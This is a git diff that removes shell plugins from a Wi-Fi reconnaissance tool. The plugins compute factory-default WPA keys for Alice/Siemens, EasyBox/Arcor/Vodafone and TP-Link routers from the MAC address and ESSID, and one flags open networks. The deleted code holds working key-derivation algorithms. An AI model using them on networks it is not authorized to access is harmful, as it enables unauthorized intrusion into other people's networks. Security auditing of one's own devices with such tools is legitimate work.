summaryrefslogtreecommitdiffstats
path: root/recon/inspect_wifi/plugins
diff options
context:
space:
mode:
Diffstat (limited to 'recon/inspect_wifi/plugins')
-rwxr-xr-xrecon/inspect_wifi/plugins/01open6
-rwxr-xr-xrecon/inspect_wifi/plugins/02alice23
-rwxr-xr-xrecon/inspect_wifi/plugins/02easybox36
-rwxr-xr-xrecon/inspect_wifi/plugins/02tplink24
-rw-r--r--recon/inspect_wifi/plugins/plugin_core41
5 files changed, 0 insertions, 130 deletions
diff --git a/recon/inspect_wifi/plugins/01open b/recon/inspect_wifi/plugins/01open
deleted file mode 100755
index 881f47ea..00000000
--- a/recon/inspect_wifi/plugins/01open
+++ /dev/null
@@ -1,6 +0,0 @@
-#!/bin/sh
-#ESSID MAC CHANNEL ENCRYPTION
-if [ "$4" == "[ESS]" ]; then
- exit 0
-fi
-exit 1
diff --git a/recon/inspect_wifi/plugins/02alice b/recon/inspect_wifi/plugins/02alice
deleted file mode 100755
index f30acc3a..00000000
--- a/recon/inspect_wifi/plugins/02alice
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/bin/sh
-# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
-# Based on Poc from
-# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
-#
-#
-# ESSID MAC CHANNEL ENCRYPTION
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-
-parse_plugin_args "$@"
-
-if ! check_vendor_mac $VENDOR_MAC "00255E" ;then
- echo "$VENDOR_MAC not affected"
- exit 1
-fi
-
-# printf always makes string to lower, need that for correct md5sum
-ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
-TMP=$(printf $ETHMAC | md5sum)
-printf ${TMP:0:12} | base64
-exit 0
diff --git a/recon/inspect_wifi/plugins/02easybox b/recon/inspect_wifi/plugins/02easybox
deleted file mode 100755
index 58816f25..00000000
--- a/recon/inspect_wifi/plugins/02easybox
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/bin/sh
-#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-parse_plugin_args "$@"
-
-if ! echo "$ESSID" | grep -q '\(EasyBox-\|Arcor-\|Vodafone-\)'; then
- echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone"
- exit 1
-else
- # Fill up to 4 places with zeros, if necessary:
- deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
- #
- # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
- hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
- #echo 'M4 (Hex): ' ${hexi[@]}
- # K1 = last byte of (d0 + d1 + h2 + h3)
- # K2 = last byte of (h0 + h1 + d2 + d3)
- c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1})
- c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1})
- K1=$((($c1)%16))
- K2=$((($c2)%16))
- #printf "K1: %x\n" $K1
- #printf "K2: %x\n" $K2
- X1=$((K1^${deci:6:1}))
- X2=$((K1^${deci:4:1}))
- X3=$((K1^${deci:2:1}))
- Y1=$((K2^0x${hexi:2:1}))
- Y2=$((K2^0x${hexi:4:1}))
- Y3=$((K2^0x${hexi:6:1}))
- Z1=$((0x${hexi:4:1}^${deci:6:1}))
- Z2=$((0x${hexi:6:1}^${deci:4:1}))
- Z3=$((K1^K2))
- printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F
-fi
diff --git a/recon/inspect_wifi/plugins/02tplink b/recon/inspect_wifi/plugins/02tplink
deleted file mode 100755
index 522c0845..00000000
--- a/recon/inspect_wifi/plugins/02tplink
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/bin/sh
-# Implementation of TP-Link default WPA Key
-# Based on
-# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-
-parse_plugin_args "$@"
-
-if ! check_vendor_mac $VENDOR_MAC F8D111; then
- echo "$VENDOR_MAC not affected"
- exit 1
-fi
-
-if echo "$ESSID" | grep -q '^tp'; then
- echo "$ESSID not affected"
- exit 1
-fi
-
-
-# printf always makes string to lower, need that for correct md5sum
-printf "${MAC:4:12}"
-exit 0
diff --git a/recon/inspect_wifi/plugins/plugin_core b/recon/inspect_wifi/plugins/plugin_core
deleted file mode 100644
index e79a3c05..00000000
--- a/recon/inspect_wifi/plugins/plugin_core
+++ /dev/null
@@ -1,41 +0,0 @@
-#!/bin/sh
-parse_plugin_args(){
- [ $# -ne 4 ] && plugin_usage && exit 1
- # convenience function to put args in ENV variables
- ESSID="$1"
-
- # mac is returned without colon
- MAC=$(printf "%s" "$2" | sed 's/://g')
- # split up the mac address to vendor and private part
- VENDOR_MAC=${MAC:0:6}
- PRIVATE_MAC=${MAC:6:12}
- CHANNEL="$3"
- ENC="$4"
- if [ ${#MAC} -ne 12 ] ;then
- echo "MAC malformed"
- exit 1
- fi
-}
-plugin_usage(){
- cat << EOF
-usage: $0 ESSID MAC CHANNEL ENC"
-
- ESSID - string
- MAC - 00:11:22:33:44:55
- CHANNEL - 4
- ENC - wpa
-EOF
-
-}
-
-check_vendor_mac(){
- needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
- shift
- for i in "$@";do
- [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
- done
- return 1
-}
-check_painmode(){
- test -z "${painmode:-}" && echo "painmode required" && exit 1
-}